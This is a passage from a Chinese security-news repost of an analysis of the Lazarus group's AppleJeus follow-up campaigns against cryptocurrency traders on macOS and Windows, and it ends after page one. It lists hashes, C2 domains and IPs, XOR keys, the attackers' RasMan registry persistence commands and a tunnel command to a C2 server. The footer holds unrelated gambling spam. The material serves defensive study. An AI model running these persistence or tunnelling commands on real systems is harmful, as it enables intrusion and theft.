歡迎來到 黑吧安全網 聚焦網絡安全前沿資訊,精華內容,交流技術心得!

Lazarus組織仍舊緊盯加密貨幣:AppleJeus后續行動介紹

來源:本站整理 作者:佚名 時間:2020-01-22 TAG: 我要投稿

Lazarus組織是當前最為活躍的APT組織之一,常常出現在各類金融網絡犯罪案件中。據網絡安全公司Group-IB的《2018年高科技網絡犯罪趨勢報告》顯示,從2017年至2018年9月,全球有14起成功地針對加密貨幣交易中心的攻擊事件,黑客總共盜走了8.82億美元的加密貨幣,而這其中有64.7%、價值5.71億美元的加密貨幣都被Lazarus一家拿走。
2018年,Lazarus為了更一步拓展加密貨幣的盜竊范圍,開始將攻擊網撒向macOS用戶,此行動也被稱作``AppleJeus行動''。他們通過自制的macOS惡意軟件植入受害者機器中,木馬初始是無害的,后續從后臺收集系統數據,進而判定是否要對系統目標展開攻擊。一旦條件符合,木馬就會打開“更新程序”,將惡意代碼安裝到設備端。
更新會安裝一些新模塊,比如Lazarus的武器之一——“Fallchill Trojan”木馬。Fallichill能夠讓攻擊者獲得計算機的無限訪問權限,再之后終端上的比特幣等加密貨幣目標,就會成為攻擊者的“囊中之物”。
此外,為了攻擊Windows用戶,Lazarus制定了多階段感染程序,并對最終負載做了很多修改。在卡巴斯基對AppleJeus行動曝光后,Lazarus在進行攻擊時變得更加謹慎,采用了許多方法來避免被發現。
AppleJeus行動后續
AppleJeus行動曝光后,Lazarus組織仍然保持了類似的作案手法,許多案例中使用的macOS惡意軟件都類似,它是一個由公開源碼構建的macOS安裝程序,作者利用了Centrabit開發的QtBitcoinTrader。

這三類macOS安裝程序都使用類似的安裝后腳本程序來植入mach-o負載,執行第二階段負載時使用的命令行參數也相同,但macOS惡意軟件在發生著變化,新的macOS惡意軟件被稱為MarkMakingBot.dmg(be37637d8f6c1fbe7f3ffc702afdfe1d),于2019-03-12創建。它沒有用于網絡通信的加密/解密例程,因此我們推測這可能只是一個中繼階段的測試版本。
Windows惡意軟件的變化
2019年3月,在一起針對Windows用戶的AppleJeus案件中,攻擊者使用了名為WFCUpdater.exe的初始感染文件和wfcwallet [.] com的偽造網站。
 

圖1. WFC案例中使用的二進制感染程序
感染過程同以往一樣,也是多階段感染,但方法不同。此次感染始于一個偽裝成WFC錢包更新程序的.NET惡意軟件(a9e960948fdac81579d3b752e49aceda)。執行后,.NET文件檢查命令行參數是否為“ / Embedding”。惡意軟件使用硬編碼的20字節XOR密鑰(82 d7 ae 9b 36 7d fc ee 41 65 8f fa 74 cd 2c 62 b7 59 f5 62)解密同一文件夾中的WFC.cfg文件,此文件模仿了連接到C2地址的錢包更新程序:
wfcwallet.com(解析的IP:108.174.195.134)
www.chainfun365.com(解析的IP:23.254.217.53)
之后,惡意軟件執行操作人員指令,以安裝下一階段的永久負載。執行者向受害者的系統文件夾中提交了另外兩個文件:rasext.dll和msctfp.dat,使用RasMan(遠程訪問連接管理器)Windows服務保證持久性機制。經過基本偵察后,操作人員使用以下命令手動植入負載:
cmd.exe /c dir rasext.dll
cmd.exe /c dir msctfp.dat
cmd.exe /c tasklist /svc | findstr RasMan
cmd.exe /c reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\RasMan\ThirdParty /v DllName /d rasext.dll /f
為了建立遠程隧道,攻擊者使用了很多工具,并通過命令行參數來執行。雖然沒有實際證據,但我們推測Device.exe負責打開端口6378,而centerupdate .exe工具用于創建到遠程主機的隧道。注意,104.168.167.16服務器用作C2服務器。下面將介紹UnionCryptoTrader案例的假網站托管服務器。
端口開啟:
%APPDATA%\Lenovo\devicecenter\Device.exe 6378
隧道工具:
%APPDATA%\Lenovo\devicecenter\CenterUpdater.exe 127.0.0.1 6378 104.168.167.16 443
macOS惡意軟件的變化
· JMTTrading
此次行動中,攻擊者將其假網站和應用程序稱為JMTTrading,使用的macOS惡意軟件也發生了很大變化,技術細節請參見Object-See發布的相關博文。我們想強調的是此次攻擊的差異之處:
· 攻擊者使用GitHub來托管惡意應用程序。
· 惡意軟件作者在其macOS惡意軟件中使用了Object-C而不是QT框架。
· macOS可執行文件中實現了簡單的后門功能。
· 與之前類似,惡意軟件使用一個16字節的XOR密鑰(X,% ' PMk-Jj8s +6=)進行加密/解密。
· 該惡意軟件的Windows版本使用ADVobfuscator(一種編譯時間混淆器)來隱藏其代碼。
· macOS惡意軟件的安裝后腳本與以前的版本有很大的不同。
· UnionCryptoTrader
UnionCryptoTrader是近期一期針對macOS的攻擊案例。技術細節請參見Objective-See博文。我們對此次攻擊總結如下:
· 安裝后的腳本與JMTTrading案例中使用的腳本相同。
· 惡意軟件作者使用SWIFT開發macOS惡意軟件。
· 惡意軟件作者改變了從受感染系統收集信息的方法。
該惡意軟件開始使用auth_signature和auth_timestamp參數進行身份驗證,以便更仔細地傳遞第二階段負載。惡意軟件能獲取當前系統時間,并將其與“ 12GWAPCT1F0I1S14”硬編碼字符串組合,產生組合字符串的MD5哈希值。該哈希值用作auth_signature參數的值,而當前時間用作auth_timestamp參數的值。惡意軟件操作員可以基于C2服務器端的auth_timestamp來復制auth_signature值。
該惡意軟件無需接觸磁盤即可加載下一階段的負載。
Windows版本的UnionCryptoTrader
Windows版本的UnionCryptoTrader(0f03ec3487578cef2398b5b732631fec)從Telegram Messenger下載文件夾執行:
C:\Users\[user name]\Downloads\Telegram Desktop\UnionCryptoTraderSetup.exe

[1] [2] [3]  下一頁

【聲明】:黑吧安全網(http://www.650547.live)登載此文出于傳遞更多信息之目的,并不代表本站贊同其觀點和對其真實性負責,僅適于網絡安全技術愛好者學習研究使用,學習中請遵循國家相關法律法規。如有問題請聯系我們,聯系郵箱[email protected],我們會在最短的時間內進行處理。
  • 最新更新
    • 相關閱讀
      • 本類熱門
        • 最近下載
        安徽快3自由的百科 平特肖最多几期不开 股票名称查询 炒股票新手入门如何开户 湖南快乐十分选号诀窍 最早的捕鱼达人旧版 股票推荐·天牛宝名气 快三的对子全包玩法 大地棋牌在哪下载 贵州体彩十一选五稳赚 体彩内蒙古11选5玩法